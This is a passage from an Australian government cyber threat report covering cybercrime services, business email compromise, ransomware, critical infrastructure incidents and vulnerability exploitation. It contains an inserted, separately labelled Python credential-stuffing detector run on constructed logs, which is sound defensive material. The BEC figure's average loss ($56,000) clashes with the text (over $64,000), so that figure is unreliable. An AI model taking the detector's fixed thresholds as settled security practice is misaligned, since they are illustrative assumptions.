A nationally and internationally distributed workforce will create additional redundancy in ASD’s critical capabilities and opportunities for greater partnership with industry, academia and other sectors of the Australian economy.

REDSPICE will provide new intelligence capabilities and build our threat intelligence picture, including through threat intelligence sharing with ACSC partners.

Enhanced National Cyber Defence

■ Improves resilience of critical infrastructure against sophisticated cyber attacks
■ Increases the visibility of threats to Australia’s most critical systems
■ Improves machine-time cyber threat intelligence sharing across government and industry
■ Doubles persistent cyber-hunt activities and nationwide cyber-incident response.

REDSPICE provides $5 billion in opportunities for Australian industry, including small and medium Australian enterprises. This will grow the wider Australian cyber security sector.
Chapter 3

Cybercrime
■ Cybercrime continues to pose a high threat to Australia’s economic and social prosperity.
■ Cybercriminals are increasingly persistent in targeting all sectors of Australia’s economy.
■ Compromises trended towards targeting high value transactions like property settlements.

Proliferation of threats
Australia is an attractive target for cybercriminals. Our widespread internet connectivity, per-capita wealth, and investment
structures—such as moveable superannuation accounts and widespread share ownership—are all powerful incentives
for cybercriminals.

During the 2021–22 financial year, fraud, financial and identity theft and BEC continued to be common cyber threats due to
their volume and ability to cause severe and long-term harm. Many actors used common techniques such as spear phishing
to compromise victims’ networks.

Australia’s cybercrime environment over 2021–22 was underpinned by the constant, rapid evolution of cybercriminal
techniques used to target Australia for profit. This evolution was not limited to malware but encompassed all aspects of
the cybercriminal environment, including target identification and exploitation, service delivery, cash-out methods, and
supporting infrastructure. Ultimately, while cybercrime capabilities became more sophisticated, they also became more
accessible for less technologically skilled actors. This ongoing evolution enabled cybercriminals to consistently adapt to
environmental changes, while remaining resilient to disruption efforts by law enforcement.

Cybercrime-as-a-Service
The evolution of Cybercrime-as-a-Service (CaaS) continued to increase the overall cybercrime threat to Australia. CaaS
encompasses an ever-increasing range of purchasable tools, services and information used to facilitate cybercriminal
operations. Examples of CaaS include, but are not limited to, the complicit provision of server infrastructure used to
host cybercriminal campaigns, the sale of access to compromised victim networks, money laundering services, and the
development and obfuscation of malware. The availability of these enabling functions means that individual actors
are not required to be an expert in every component of a criminal operation. In effect, cybercriminals are outsourcing
elements of their operations, and a growing black market is serving their needs.

Figure 8: Cybercrime-as-a-Service ecosystem. A cybercriminal campaign draws on the following purchasable services:

■ Access brokers
■ Hosting services
■ Malware distributors
■ Phishing kit developers
■ Malware obfuscation services
■ Malware developers
■ Money laundering services

The expansion of the CaaS industry has lowered the barrier to entry for actors seeking to conduct cybercrime. For instance,
Ransomware-as-a-Service (RaaS) provides actors who may not have the technical skill to develop their own ransomware
with an opportunity to launch highly profitable attacks. In addition, the CaaS industry allows actors to monetise their
expertise in a particular skillset. As a consequence, cybercriminals have become more specialised over 2021–22, and pose a
greater threat to Australians and businesses.

During 2021–22, the ACSC collaborated with partners on 5 successful operations against criminal online marketplaces and
foreign scam networks. While offshore cybercrime groups have exploited Australian victims, individual actors—including
Australian citizens—remain a threat. Australian law enforcement agencies have leveraged international partnerships to
tackle criminal behaviour across the globe.

Case Study: Operation Boone


In October 2021, the New South Wales (NSW) Supreme Court ordered the forfeiture of $1.66 million by a 23-year-old Sydney
man. This followed his conviction for selling illegally obtained logins for online services such as Netflix. More
than $1.2 million of the proceeds were in cryptocurrency, making for the largest seizure of cryptocurrency in
Australian history.

This was the culmination of Operation Boone, a five year joint investigation by the AFP and the US Federal Bureau of
Investigation (FBI). The Australian man conspired with a US individual to steal the credentials of streaming service
customers. The Australian sold the credentials through 4 account-generator websites which had over 150,000 users.

The proceeds were money-laundered through a complex system of PayPal accounts and cryptocurrency wallets. Following
an extensive investigation, the AFP seized the cryptocurrency and PayPal accounts and charged the Australian with
5 offences.

Operation Boone demonstrates how the AFP’s cybercrime investigation and asset confiscation capabilities work together.
The Australian was sentenced to a 2 year, 2 month intensive corrections order, while the confiscated $1.66 million will be
reinvested in the Australian community through initiatives that include local crime prevention and drug treatment programs.

For individuals, the case study highlights the importance of not reusing passwords. The theft of streaming service logins
relied on credential stuffing—using stolen usernames and passwords to access other services via automated logins. If
account owners had used secure passphrases or multi-factor authentication (MFA), their accounts would not have been
compromised by the offender.
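As an added illustration of the credential-stuffing pattern described above (example code, not part of the ACSC report), the following Python scans constructed authentication log lines for a single source address trying many distinct accounts with mostly failed logins, and lists the accounts that nevertheless authenticated so they can be reset and enrolled in MFA. The log format, sample lines and thresholds are assumptions.

```python
"""Credential-stuffing detector over web-application authentication logs.

Added example, not code from the ACSC report. Credential stuffing replays
stolen username/password pairs against many accounts through automated
logins, so the defender's signal is one source address attempting many
distinct accounts, mostly failing, within a short window. The log format,
sample lines and thresholds below are constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log in a hypothetical "timestamp ip username result" format.
# 203.0.113.10 sprays eleven different accounts in a few seconds (one succeeds);
# 198.51.100.7 is a user mistyping their own password; 192.0.2.44 is normal.
SAMPLE_LOG = """\
2021-10-01T09:00:01Z 203.0.113.10 alice FAIL
2021-10-01T09:00:02Z 203.0.113.10 bob FAIL
2021-10-01T09:00:02Z 203.0.113.10 carol FAIL
2021-10-01T09:00:03Z 203.0.113.10 dave OK
2021-10-01T09:00:03Z 203.0.113.10 erin FAIL
2021-10-01T09:00:04Z 203.0.113.10 frank FAIL
2021-10-01T09:00:04Z 203.0.113.10 grace FAIL
2021-10-01T09:00:05Z 203.0.113.10 heidi FAIL
2021-10-01T09:00:05Z 203.0.113.10 ivan FAIL
2021-10-01T09:00:06Z 203.0.113.10 judy FAIL
2021-10-01T09:00:06Z 203.0.113.10 mallory FAIL
2021-10-01T09:01:00Z 198.51.100.7 alice FAIL
2021-10-01T09:01:10Z 198.51.100.7 alice FAIL
2021-10-01T09:01:20Z 198.51.100.7 alice OK
2021-10-01T09:05:00Z 192.0.2.44 bob OK
"""


def parse_log(text):
    """Parse log lines into (timestamp, ip, user, success) tuples sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts_str, ip, user, result = line.split()
        ts = datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, ip, user, result == "OK"))
    events.sort(key=lambda e: e[0])
    return events


def detect_credential_stuffing(events, window=timedelta(minutes=5),
                               min_accounts=10, min_fail_rate=0.8):
    """Return one alert per source IP that, within a single window, attempted
    at least min_accounts distinct usernames with a failure rate of at least
    min_fail_rate. Each alert lists the accounts that logged in successfully
    during the attack: those credentials are confirmed valid and should be
    reset and enrolled in MFA."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        by_ip[ip].append((ts, user, ok))

    alerts = []
    for ip, attempts in by_ip.items():
        best = None
        for i, (start, _, _) in enumerate(attempts):
            # Every attempt from this IP in the half-open window [start, start + window).
            in_window = [a for a in attempts[i:] if a[0] < start + window]
            users = {u for _, u, _ in in_window}
            failures = sum(1 for _, _, ok in in_window if not ok)
            if len(users) < min_accounts:
                continue
            if failures / len(in_window) < min_fail_rate:
                continue
            # Keep the window that covers the most distinct accounts for this IP.
            if best is None or len(users) > best["distinct_accounts"]:
                best = {
                    "ip": ip,
                    "window_start": start.isoformat(),
                    "attempts": len(in_window),
                    "distinct_accounts": len(users),
                    "failures": failures,
                    "successes": sorted({u for _, u, ok in in_window if ok}),
                }
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_credential_stuffing(parse_log(SAMPLE_LOG)):
        print(f"{alert['ip']}: {alert['distinct_accounts']} accounts tried, "
              f"{alert['failures']}/{alert['attempts']} failed, "
              f"successful logins to reset: {alert['successes']}")
```

The repeated failures from 198.51.100.7 against a single account are not flagged, because the distinguishing feature of stuffing is breadth across accounts rather than depth against one.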


Business Email Compromise


BEC, where malicious actors compromise organisations via email, continues to be lucrative for cybercriminals. BEC
is not limited to scamming businesses out of money or goods. Cybercriminals also use BEC to pretend to be business
representatives or to trick employees into revealing confidential business information. BEC is also an entry point for
malicious actors to move into higher value targets within networks. The compromise of a single employee email can be a
prelude to a major ransomware attack.

In 2021–22, the number of successful BEC reports declined slightly to 1514. However, self-reported losses in 2021–22 increased
significantly to over $98 million. Nationally, the average loss per successful BEC increased to over $64,000. The most BEC
reports came from Queensland (389 reports), but average self-reported financial losses were highest in Western Australia,
at approximately $112,000 per report. Western Australia had several reports of financial losses over $1 million due to BEC,
lifting its overall average.

Investigations into BEC suggest property settlements are being targeted. This is likely due to the high value of transactions.
Property prices increased further during the coronavirus pandemic and digital settlement methods became more
entrenched, making property transactions an attractive target. Despite the best efforts of law enforcement agencies, only a
small fraction of BEC financial losses are ever recovered.

Figure 9: Breakdown of successful BEC reports by jurisdiction for financial year 2021–22 (map; total cases 1514, average loss $56,000). Per-jurisdiction report counts and average losses are shown on the map; the text above records Queensland with 389 reports and Western Australia with an average loss of approximately $112,000 per report.

AFP Initiative: Operation Dolos


Operation Dolos is an AFP-led, multi-agency taskforce which counters transnational cybercriminals conducting or
facilitating BEC—a cybercrime which commonly crosses borders. Operation Dolos targets and disrupts the BEC crime model,
ultimately disrupting transnational organised cybercrime syndicates.

To do this, Operation Dolos works with individual Australians and small to medium businesses that have been targeted by
BEC, and disrupts the flow of proceeds to and from BEC syndicates. In December 2021, the AFP announced the arrest of 18
money mules by NSW Police, Victoria Police, and Queensland Police.

In the 2021–22 financial year, Operation Dolos was able to recover over $5.97 million in funds stolen by cybercriminals.

Case study: Falsified invoices via BEC


In July 2021, an Australian financial firm fell victim to BEC, paying over $600,000 on behalf of one of their clients after
receiving a falsified invoice. The invoice appeared to be legitimate and from a business that they regularly dealt with, but
the bank details had been altered to an account controlled by cybercriminals. The funds were laundered through the
purchase of cryptocurrency, gold bullion, cash withdrawals and other purchases.

In April 2022, AFP Cyber Command, NSW Police, and Victoria Police conducted a joint activity under Operation Dolos and
arrested the member of the syndicate responsible for laundering the proceeds of the crime. Over $140,000 was recovered
and returned to the victim.

The case study illustrates the importance of verifying requests for large payments and banking changes, even when they
appear to come from businesses with an established reputation. Technical controls such as MFA and secure email gateways
can also protect organisations from BEC.


How to protect yourself from cybercrime


Cybercriminals are increasingly persistent in targeting all sectors of Australia’s economy. Financial losses divert resources from other areas of critical need. The ACSC seeks to counter this targeting through tailored advice to different sectors of Australian society; for instance through the Act Now, Stay Secure communication and uplift program.

Over the 2021–22 financial year, the Act Now, Stay Secure advertising campaign:

■ delivered over 57 million online ads to Australians through social media, video and search
■ reached over 6.2 million Australians through broadcast radio advertising
■ was supported by an organic social media campaign with a potential reach of 637,000 people
■ was amplified by 191 stakeholders sharing campaign content to their own channels.

Act Now, Stay Secure themes

■ July 2021: Email Security
■ August 2021: Backups
■ September 2021: Annual Cyber Threat Report
■ October 2021: Updates
■ November 2021: Online Shopping
■ The launch of the Australian Cyber Security Hotline
■ The launch of the online learning resources on cyber.gov.au
■ The launch of the Small Business Cyber Security guide
■ February 2022: Secure Your Portable Devices; Cyber Security Instruction Manual: A Kid’s Guide
■ March 2022: Backups; ACSC Alert and Advisory
■ April 2022: Ransomware
■ May 2022: Password Managers
■ June 2022: Email Security
Chapter 4

Ransomware
■ The ACSC assesses that ransomware remains the most destructive cybercrime threat.
■ All sectors of the Australian economy were directly impacted by ransomware in the last
financial year.
■ The ACSC provides tailored advice on ransomware mitigation, including for individuals and
small business.

Ransomware targeting

Ransomware is a cyber dependent crime which can impact everyone from consumers through to countries. For example, the Costa Rican government declared a state of emergency in May 2022 following ransomware attacks on nearly 30 government institutions, including its health, finance, energy and social services departments. While Australia has not experienced an incident of this scale, the potential remains for cybercriminals to cause widespread disruption.

Top-tier ransomware groups are continuing to target Australian ‘big game’ entities—organisations that are high profile, high value, or provide critical services. While global trends indicate a decline in ‘big game’ targeting and a shift towards targeting small and medium sized businesses, that change has yet to be seen in Australia.

The business model of ransomware groups continued to evolve. Some ransomware groups now share victim information, increasing the ransomware threat as victims potentially face targeting by more than one group. For example, after announcing its shutdown, the BlackMatter group transferred its victims to ransomware infrastructure owned by another group, known as Lockbit 2.0. And, in October 2021, members of the Conti ransomware group reportedly began selling access to victims’ networks, enabling follow-on targeting by other actors.

Ransomware tactics

The combination of data encryption and threats to publicly release sensitive information as a method of pressuring ransomware victims into paying is known as ‘double extortion’. Victims who previously would have been able to recover from a ransomware incident by maintaining regular backups may still be vulnerable to reputational damage resulting from double extortion. In 2021–22, ransomware actors continued to incorporate additional extortion tactics in their operations to more effectively extract payment from victims. This is often referred to as ‘multifaceted extortion’. Examples of additional extortion tactics include convincing third-party stakeholders to pressure victims into negotiation, and sustained DDoS attacks against the victim’s network during ransom negotiations.

Ransomware-as-a-Service

The ACSC observed the emergence of new and possibly rebranded RaaS operations over 2021–22. The availability of RaaS offerings affords cybercriminals a choice about the tools they can use. Ransomware syndicates also continued to professionalise by using third parties to negotiate with victims, assist them in receiving their ransom payments, and arbitrating disputes between actors.

Figure 10: The ransomware business model

■ Pre-crime: Cybercriminals establish themselves online and obtain the necessary skills, experience and/or relationships to be successful.
■ Preparation: Cybercriminals design and implement their operating model, including establishing technical and financial infrastructure and selecting their target.
■ Money Movement 1: Cybercriminal → Service Providers.
■ Actualisation: Cybercriminals commit the crime, including conducting network reconnaissance, exfiltrating data and encrypting files.
■ Engage and negotiate: Cybercriminals engage with victim/third party to apply pressure and/or negotiate ransom payment.
■ Money Movement 2: Victim → Cybercriminal.
■ Exit: Cybercriminals conclude the crime and cease all victim contact. Depending on ransom payment, cybercriminals will leak or decrypt victim data.
■ Post-crime: Cybercriminals profit from the activity, including laundering the funds to safely access the proceeds of crime. Cybercriminals pay collaborators and advertise success to enhance reputation.
■ Money Movement 3: Cybercriminal → Criminal Associates.

Ransomware trends

All sectors of the Australian economy were directly impacted by ransomware in 2021–22. The ACSC received 447 ransomware cybercrime reports via ReportCyber. While this is a 10 per cent decrease compared with the 2020–21 financial year, reports remain higher than in 2019–20. It is also likely that ransomware remains significantly underreported, especially by victims who choose to pay a ransom.

The education and training sector reported the most ransomware incidents in 2021–22, rising from the fourth-highest reporting sector in 2020–21. The threat to the education and training sector is significant as its business model favours open collaborative environments. Remote learning during the coronavirus pandemic also introduced large numbers of personal devices and new software into this sector.

The top 5 reporting sectors for ransomware accounted for 47 per cent of all ransomware-related cybercrime reported to ReportCyber during the 2021–22 financial year.

The ACSC responded to 135 cyber security incidents related to ransomware, an increase of over 75 per cent compared to 2019–20. In addition, the ACSC identified and notified 148 organisations of ransomware activity.

Education and Training 11%

Information Media and Telecommunications 10%

Professional, Scientific and Technical Services 10%

Government – State/Territory/Local 8%

Health Care and Social Assistance 8%

Figure 11: Top 5 reporting sectors for ransomware-related cyber security incidents


AFP–ACSC–ACIC Initiative: Operation Orcus


In July 2021, the AFP established Operation Orcus, an AFP-led multi-agency taskforce to coordinate law enforcement efforts
against ransomware, particularly targeting ransomware developers and those who use RaaS. The taskforce comprises
AFP, ACSC, ACIC, AUSTRAC and state and territory police. Operation Orcus also works with international partners, including
Interpol and Europol.

During 2021–22, Operation Orcus analysed hundreds of ransomware incidents and prepared and distributed intelligence
reports. Operation Orcus detected indicators of compromise showing Australian organisations being targeted by
ransomware, and notified impending victims. These notifications prevented attacks and protected Australian organisations
from financial loss.

Data breaches
Cybercriminals target the PII of employees and customers, seeking to maximise the commercial and reputational impact
of a data breach. In the last financial year, human resources organisations such as payroll and recruitment companies
have been frequently targeted by ransomware actors, as these types of companies provide services across a wide range
of sectors. Compromises of payroll providers in 2021–22 led to the data of hundreds of thousands of Australian employees
being accessed and exposed.

Social assistance organisations, which hold sensitive data on vulnerable people, have also been targeted in Australia and
internationally. For example, in January 2022, the Swiss-based International Committee of the Red Cross publicly stated
a ransomware attack on its servers had compromised the personal data of more than half a million people, including
refugees and internally displaced people in conflict zones across the world.


Case Study: Australian social assistance organisation


In March 2022, an Australian social assistance organisation was targeted by ransomware resulting in the theft of data. The
malicious actor gained access to the organisation’s servers through exploiting an unpatched version of Microsoft Exchange.
Within 4 days, the malicious actor moved from initial access to encryption. The organisation’s Chief Information Security
Officer told the ACSC, “it spins my head about how quickly they were able to move around the network”.

The organisation identified that its systems had been encrypted and immediately notified Commonwealth and state
agencies. It engaged its existing commercial incident response provider to provide technical support and conduct an
investigation. The organisation credits its ability to recover so quickly to maintaining a strong relationship with its incident
response provider and moving to cloud-based backups in the months before the incident. Remediation and related network
security improvements cost approximately $200,000, which was substantially less than the ransom demanded.

Since this incident, the organisation continues to monitor for residual risk, and is hardening its cyber defences more broadly,
including enhanced restrictions for applications, and better managed network awareness.

During the organisation’s engagement with the ACSC, it shared indicators of compromise, which the ACSC shared through
the CTIS portal. This enabled other organisations to better protect themselves, ultimately strengthening the security of
Australian organisations.


Cost to victims of ransomware


Regardless of the size of the victim, ransomware can be expensive to resolve. The most immediate costs come from the lost
productivity due to system downtime, and the time and money needed to rebuild systems following an incident. The legacy
of a ransomware incident poses additional challenges, such as tarnishing a victim’s reputation among its customers.

Case Study: Australian healthcare organisation


A Sodinokibi (also known as REvil) ransomware group targeted a medium-sized business in the Australian healthcare sector,
encrypting critical files and preventing access to business-critical systems. The malicious actor demanded several hundred-
thousand dollars in exchange for the decryption keys and an assurance that the stolen data would not be publicly released.

Even with the involvement of specialists, ransomware incidents can take months to resolve. In this instance, despite the
engagement of a law firm, third-party negotiator and insurance company, and a willingness by the victim to pay the ransom,
resolution and restoration of data took approximately 3 months, severely impacting business operations for the victim.

Victims of ransomware attacks continued to use third-party negotiators to facilitate payment of ransom demands in
2021–22. The level of coverage provided under cyber insurance policies is also a contributing factor in how these incidents
are handled and resolved by victims, and whether a business decides to pay the ransom.

A 2022 study published by the Australian Institute of Criminology found only 19 per cent of ransomware victims sought
advice or support from police or the ACSC. However, the study found nearly 60 per cent sought help from at least one
formal source outside of their family or friends. The study found 23.2 per cent of small to medium business victims paid the
ransom, with many millions of dollars being paid in ransoms and other associated costs.

ACSC advice on payment of ransom demands


The ACSC advises against paying a ransom. Doing so does not guarantee a victim’s files will be restored,
nor does it prevent the publication or sale of any stolen data. Along with increasing the likelihood of a
victim being targeted again, each ransom payment also bolsters the viability of the ransomware market
and puts other Australian organisations at greater risk.

Irrespective of the decision to pay a ransom, all victims are strongly encouraged to report ransomware-related cybercrime
and cyber security incidents to the ACSC. This is essential to develop national visibility of ransomware threats, including
emerging trends and ransomware precursors. Even when organisations have sufficient in-house or contracted incident
response to address a ransomware incident, sharing technical and contextual information with the ACSC enables the ACSC
to implement measures to reduce ransomware targeting and protect other potential victims.


Ransomware Action Plan


On 13 October 2021, Australia’s Ransomware Action Plan was released. The plan outlined the proposed
capabilities and powers that Australia would use to combat ransomware, and a suite of reforms designed
to help the Australian Government better assist victims of ransomware attacks and prosecute ransomware
groups. Complementing a range of measures under the 2020 Cyber Security Strategy, the plan seeks to
ensure that Australia remains a hard target for cybercrime by launching additional operational activity to
target criminals seeking to disrupt, and profit from, Australian business and individuals.

What you should do


How to protect yourself from ransomware

To support Australians in preventing and mitigating ransomware incidents, the ACSC provides
technical advice and guidance, including profiles of ransomware actors, via cyber.gov.au. The ACSC
also collaborates with domestic and international intelligence and law enforcement partners to
disrupt the syndicates causing the greatest harm, and provide operational intelligence regarding
cybercriminals targeting Australia. This is a part of a whole-of-government approach to combating
ransomware.

Organisations can protect themselves from ransomware using the ACSC’s tailored guidance below.

Individuals, and small and medium-sized businesses:

■ Follow the steps in the ACSC’s Ransomware Prevention and Protection Guide.

Government, large businesses and critical infrastructure:

■ Implement the ACSC’s Essential Eight Mitigation Strategies and Strategies to Mitigate Cyber
Security Incidents.
■ Become an ACSC partner and participate in ACSC initiatives and exercises.

Chapter 5

Critical infrastructure
■ The disruption of critical infrastructure puts access to essential services at risk.
■ Globally, critical infrastructure has been increasingly targeted by malicious actors.

Current critical infrastructure threat


The cyber threat to Australia’s critical infrastructure is an enduring concern, because the social or economic well-being of
the nation depends on critical infrastructure assets working in cohesion. Critical infrastructure encompasses the physical
facilities, communication networks, and information and operational technologies that provide essential services. A
sustained disruption in one part of the critical infrastructure ecosystem has knock-on effects elsewhere in the economy,
and could ultimately lead to harm or loss of life, as seen internationally as a consequence of ransomware attacks on
health services. The potential remains for state actors and cybercriminals to cause similar disruption through targeting of
Australian critical infrastructure entities.

During 2021–22, critical infrastructure networks globally were targeted at phenomenal rates. Russia’s targeting of Ukrainian
critical infrastructure was particularly prolific, including the use of destructive malware against high-voltage electrical
substations. However, the threat is not limited to Ukraine. Some Russia-aligned cybercrime groups—including one that has
successfully targeted Australian critical infrastructure—have publicly threatened to conduct operations against Ukraine’s allies.

The risk to Australia’s critical infrastructure networks is real. In 2021, the corporate network of electricity generator CS Energy
was targeted by the Russia-aligned Conti ransomware group, as detailed below.

Case Study: CS Energy


In 2021, the corporate ICT network of Queensland Government-owned electricity generator CS Energy—which generates
10 per cent of the electricity for the national electricity market—was targeted by the Conti ransomware group. On 27
November 2021, CS Energy became aware of a ransomware incident affecting its corporate network and immediately
severed the external internet connection to its corporate network and initiated business continuity procedures.

CS Energy also alerted relevant Australian Government and Queensland Government agencies, and as an established
ACSC partner, closely collaborated with ACSC incident response support and external specialists to remedy the incident.
As a result of network segregation—a recommended mitigation for business continuity—CS Energy’s operational
technology systems were physically segregated from the corporate network, ensuring that the incident did not compromise
operational technology systems, including electricity generation. Energy supplies were not affected by the incident.

This incident highlights the value of network segmentation and the importance of having incident response, business
continuity and disaster recovery plans in place. By acting decisively, CS Energy, commercial incident response and cyber
security specialists, and the ACSC worked together to respond to the incident, demonstrating the maturity of Australia’s
cyber security sector.

Not all targeting of critical infrastructure is geostrategic; some is profit-motivated, and some is opportunistic exploitation of
widespread vulnerabilities. Even the most trivial exploitation can result in major impact, especially if malicious actors move
laterally from internet-facing devices on corporate networks to the operational networks of critical infrastructure providers.
Certain critical infrastructure networks face additional challenges, such as the use of legacy operational technology with
long life cycles (up to 50 years for some operational hardware), making patching and monitoring of networks more difficult.


Critical infrastructure trends


During 2021–22, the ACSC reshaped its definition of critical infrastructure to better align with the definitions of Regulated
Critical Infrastructure and Systems of National Significance under the SoCI Act. In the 2020–21 financial year, the ACSC
defined approximately one quarter of cyber security incidents it responded to as affecting critical infrastructure. However,
this definition covered a range of infrastructure and services outside the scope of the SoCI Act, and also captured
some severe incidents regardless of sector. In the 2021–22 financial year, using the new definitions, 95 cyber incidents
(approximately 8 per cent of all cyber incidents the ACSC responded to) affected critical infrastructure. Since the
implementation in April 2022 of amendments to the SoCI Act, the ACSC has notified 5 critical infrastructure entities of cyber
incidents and vulnerabilities on their networks.

The ACSC urges organisations to report all cyber security incidents, regardless of whether or not their organisation is
subject to mandatory reporting under the SoCI Act. Reporting increases the visibility of threats, enables the identification of
trends, and supports the prevention and mitigation of future incidents.


Ransomware and critical infrastructure


Over 2021–22, there were further examples of ransomware groups targeting critical infrastructure. For instance, the BlackCat
ransomware group targeted government and critical infrastructure organisations, as well as the finance and construction
sectors globally.

The threat to critical infrastructure is not limited to large utilities such as electricity providers. For example, local governments
can be an attractive target, as some councils have responsibility for essential services such as water and sewage.

Case Study: Local council ransomware incident


In April 2022, a NSW council was targeted by a ransomware incident. The initial access occurred at least 2 weeks before the
incident, with the malicious actor likely timing the incident to occur over the Easter long weekend.

Manual processes were immediately implemented to manage water-quality testing and level monitoring, and temporary
servers were established within 24 hours to restore remote monitoring.

The incident impacted a wide range of business operations, including council minutes, employee financial data, and
systems responsible for monitoring water quality. The incident also had a huge impact on council technology staff, who
worked 40–80 hours overtime a week during their initial response.

The council engaged a commercial incident response provider, and its Managed Service Providers (MSP) deployed
additional capabilities. The ACSC provided advice to the council and warned ACSC partners in the water sector to be alert
to possible ransomware targeting.

The incident demonstrates the interplay between IT, operational technology, and the physical environment. The initial
access through a legacy entry point impacted multiple systems, including operational technology systems, which meant
that council workers had to manually test water quality and levels following overnight rain. A swift response by the council,
its MSP, and the ACSC ensured there was no compromise of water or sewage services. The council’s MSP continues to
monitor the darkweb for data leaks.

The case study demonstrates the importance of decommissioning legacy systems and erecting firewalls between IT and
operational technology systems.


Advice and support for critical infrastructure organisations

A wide range of critical infrastructure providers are subject to mandatory cyber incident reporting requirements, including
critical food, transport and higher education assets. The ACSC has a dedicated portal for reporting cyber security incidents
that impact critical infrastructure assets, including a list of critical infrastructure sectors and asset classes following
amendments to the SoCI Act.

In recognition of the additional cyber security obligations critical infrastructure organisations have, the ACSC offers tailored
critical infrastructure exercise and uplift programs. These assist ACSC partners to implement risk mitigation strategies.

ACSC initiative: AquaEx


In August 2021, the ACSC coordinated a national cyber security exercise series in partnership with Australia’s urban water
and wastewater sector and government agencies. The exercise series provided an opportunity for industry and government
to exercise arrangements for responding to, and recovering from, a ransomware incident impacting Australia’s urban water
and wastewater sector.

Planning for the exercise series included exercise management workshops and cyber security information sessions.
These provided opportunities for participants to share approaches to preventing, detecting and responding to
ransomware incidents.

Executive and senior management were actively engaged in the exercise series, with some organisations conducting their
largest ever exercises. Participating executives have indicated that they would like their organisation to be involved in more
exercises like AquaEx in the future. It is this level of support and engagement at senior levels that will continue to increase
organisational cyber resilience.

Opportunities that have been identified as a result of AquaEx include organisations continuing to review and exercise their
cyber response plans, expanding their playbooks to include more threat vectors, and solidifying the relationships developed
between industry and government.

Despite COVID-19 impacts, the exercise reached over 750 participants from across industry and government who were able
to work together to strengthen cyber resilience across the nation.


ACSC initiative: Critical Infrastructure – Uplift Program


In support of Australia’s critical infrastructure, in 2021–22 the ACSC piloted the Critical Infrastructure Uplift Program (CI-UP).
CI-UP is a voluntary service provided by the ACSC to help protect Australia’s essential services from cyber threats by raising
the cyber security levels of critical infrastructure organisations.

Through close collaboration between the ACSC and partners, CI-UP evaluates the cyber security maturity of critical
infrastructure and systems of national significance. A combination of Cyber Security Capability and Maturity Model (C2M2)
and Essential Eight maturity models are used to deliver prioritised vulnerability and risk management strategies.

The pilot concluded in June 2022. The ACSC now provides 2 models for CI-UP service:

CI-UP: A modular suite of cyber security maturity activities undertaken through close collaboration with the ACSC to deliver
holistic cyber security maturity uplift for CI-UP partners.

CI-UP (Self-Assessment): A self-assessment C2M2 evaluation tool enabling ACSC partners to access online resources
through the ACSC Partner Portal.

Case Study: CI-UP pilot uplift


In late 2021, the ACSC undertook multiple pilot uplifts with critical infrastructure organisations at differing cyber security
maturity levels.

In one pilot, the ACSC partnered with Queensland Airports Limited (QAL) to understand the maturity of its cyber security.
This uplift was conducted remotely due to COVID-19 impacts, but was successful nonetheless due to QAL’s proactive
engagement. The active participation gave the CI-UP team a deep understanding of QAL’s baseline cyber security posture,
enabling the provision of targeted advice.

Despite the challenges of working during COVID-19 restrictions, the ACSC and QAL teams collaborated to deliver one of
QAL’s most successful cyber outcomes to date.

As a result, QAL has a better understanding of its holistic cyber security posture, and a prioritised list of recommended
remediation activities to continue hardening its cyber defences.

Chapter 6

Critical vulnerabilities
■ The ACSC observed an increasing trend of state actors and cybercriminals rapidly exploiting publicly reported critical security vulnerabilities.
■ Rapid and comprehensive patching is vital, along with constant monitoring for indicators of compromise.

Vulnerabilities being targeted faster and by more actors

During 2021–22, the number of software vulnerabilities recorded worldwide increased by more than 25 per cent compared
to the previous financial year. Over 24,000 Common Vulnerabilities and Exposures (CVEs) were identified during 2021–22.
Of these, there were numerous critical and high-impact vulnerabilities, with notable examples including vulnerabilities in
Microsoft Azure and Log4j products. Within hours of disclosure, the ACSC identified malicious actors conducting scanning
and reconnaissance against internet-accessible networks to identify unpatched software. In some instances, cyber actors
successfully compromised Australian networks using publicly disclosed critical vulnerabilities.

The rapid use of newly released critical vulnerabilities is now standard tradecraft for many malicious actors. Certain
software and hardware is used ubiquitously across government, critical infrastructure, small business and by individual
users, presenting malicious actors with a plethora of potential victim networks. When a new vulnerability emerges,
the ACSC’s Cyber Hygiene Improvement Programs (CHIPs) frequently identifies numerous Australian devices which are
unpatched and vulnerable to exploitation.

ACSC Initiative: Cyber Hygiene Improvement Programs (CHIPs)


CHIPs is an ACSC capability that tracks and monitors the cyber security posture of Australian, state, territory and local
government entities’ internet-facing assets. CHIPs also conducts rapid operational tasking when potential cyber threats
emerge, such as newly disclosed vulnerabilities.

Through these activities, CHIPs can quickly build visibility of security vulnerabilities across all levels of government and
provide vulnerability notifications to system owners.

In 2021–22, 49 high priority operational tasks were undertaken to protect Australian networks, including scans of government
entities and Australian-attributed Internet Protocol addresses for potential compromise by critical vulnerabilities.

Case Study: Australian energy provider


Following the public disclosure of a vulnerability in April 2022, CHIPs contacted several Australian organisations from
across the government, critical infrastructure, transportation and services sectors, notifying them of potentially vulnerable
software on their internet-facing servers, and offering assistance. One of the organisations contacted was an Australian
energy provider.

Immediate actions from the energy provider in response to ACSC’s notification confirmed 2 servers had been exploited. Existing
network segmentation, specifically a demilitarised zone (DMZ)—a network kept separate from the core network to protect
information from less trusted networks, such as the internet—worked as intended. As a result, energy operations were not
disrupted. The provider was quick to remediate by restoring the affected servers from backups and applying relevant patches.

Further to the actions of the energy provider, the ACSC conducted a forensics investigation to reconstruct the steps taken by
the malicious actors. The investigation found that multiple instances of successful exploitation of the vulnerability occurred
in a very short period of time. Evidence suggests that exploitation was conducted by multiple actors, including state-
sponsored and criminal entities, much of which was likely automated. Sophisticated actors sought to access user login
data, with the likely intent to gain more persistent access once the compromise was remediated.

The responsiveness of the energy provider and strong network segmentation were crucial to containing the compromise.


Comparative critical vulnerabilities timelines


The time between vulnerability disclosure and exploit is closing rapidly; what once took weeks is now taking days or even
hours. The following timelines highlight the shortening window for organisations to mitigate threats:

F5 BIG-IP

What is F5 BIG-IP? A platform used to control traffic that passes through an enterprise network, developed by US company F5.

4 May 2022: F5 publicly disclosed a vulnerability in BIG-IP network devices that allowed malicious actors to execute arbitrary
commands, create or delete files, or disable services. F5 encouraged users running at-risk versions to upgrade as soon as possible.

6 May 2022: ACSC performed CHIPs scanning to determine how many Australian devices were vulnerable, and notified
government operators.

